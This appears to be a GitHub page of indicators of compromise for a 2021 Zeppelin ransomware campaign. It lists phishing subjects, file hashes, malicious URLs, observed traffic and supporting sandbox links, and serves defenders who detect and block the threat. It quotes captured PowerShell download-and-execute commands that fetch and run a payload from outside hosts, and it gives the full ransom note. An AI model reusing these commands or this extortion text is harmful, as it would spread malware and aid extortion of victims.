forked from executemalware/Malware-IOCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path2021-09-01 Zeppelin Ransomware IOCs
122 lines (101 loc) · 3.62 KB
/
2021-09-01 Zeppelin Ransomware IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
THREAT IDENTIFICATION: ZEPPELIN RANSOMWARE
SUBJECTS OBSERVED
Bill W-97746 for online order 271645 is covered.
Bill XE-59269 for online order 951666 is covered.
docs
documents
files
information
papers
paperwork
SENDERS OBSERVED
ZIP FILE HASHES
012299610c7595d1bdae6c321acf4cb2
17605f87137649b140e0420ad66ebc76
1953dce993e3ab975f7e7d8b93aca772
36f0ecfca4ca6a1d69fd761272ee231a
404679a5f2b6213449d23bcd15da6061
6418bec5672343bda06a6039d7e04e17
7ea2ff1b7167e3c04e722bd78cd58355
a78bb02f6715e4600d1c0e204ed3d85a
d569e4d8c8733b4e0516315692d5875c
f2073bcf863346b43f3c1ed6393f8f35
JAVASCRIPT FILE HASHES
0e544f7d6723a83df8095cfd978b240f
1f185f20f21f2d2bc7e78d830e31e685
4a523584342127326fbb242723eb59f7
4c941a179f8fabbd4204cb5ca7d47b60
59c2900e607f7c332c58f308aee48f25
698cbec287409f76bb12127b8d8d4c81
96bd000b72c1622017d5218ff0401587
a1ea178159b7663900f88ce48aa4e75d
bd8cab14c86e7cd0cd4a3b2d6bcc2e1a
dc744c768d84c10f82bbbb481c4a178c
ADDITIONAL FILE HASHES
Payment.zip
4849be6b923692f3b50e37e7ec2651f4
ADDITIONAL PAYLOAD FILE HASHES
bin.exe
d6eb8fdfcf2c636bca2c8e6d88829aeb
CAPTURED/DECODED COMMAND FROM RUNNING THE JS FILE
IEX (New-Object Net.Webclient).downloadstring("https://jolantagraban.pl/log/57843441668980/dll/assistant.php")
COMMAND RETURNED FROM VISITING THE PHP URL (ABOVE)
$path = $Env:temp+'\aPwUd.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://kenire.co.ke/cli/985853400833/pattern.exe',$path); Start-Process -FilePath $path
INTERMEDIATE DOWNLOAD URLS
https://jolantagraban.pl/log/57843441668980/dll/assistant.php
ZEPPELIN PAYLOAD URLS
https://kenire.co.ke/cli/985853400833/pattern.exe
ZEPPELIN PAYLOAD FILE HASHES
pattern.exe
dcef208fcdac3345c6899a478d16980f
ADDITIONAL OBSERVED NETWORK TRAFFIC
http://geoiptool.com/
www.geodatatool.com
http://iplogger.org/1L3ig7.gz
RANSOM NOTE CONTENTS
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: [email protected]
Reserved email: [email protected]
Reserved email: [email protected]
Your personal ID: AXX-4XX-1XX
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/browse.php?search=dcef208fcdac3345c6899a478d16980f
https://app.any.run/tasks/5e74bc25-136c-49bb-85b3-86cc1f482edb/
https://www.virustotal.com/gui/file/824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc/detection
https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/buran
XLoader/Formbook References:
https://www.virustotal.com/gui/file/dc26789a27709300dcdd742b50b8acb5c4d96d13c0aa5adb69c4f76d8e75c8ba/detection
https://tria.ge/210822-ymazkdezzn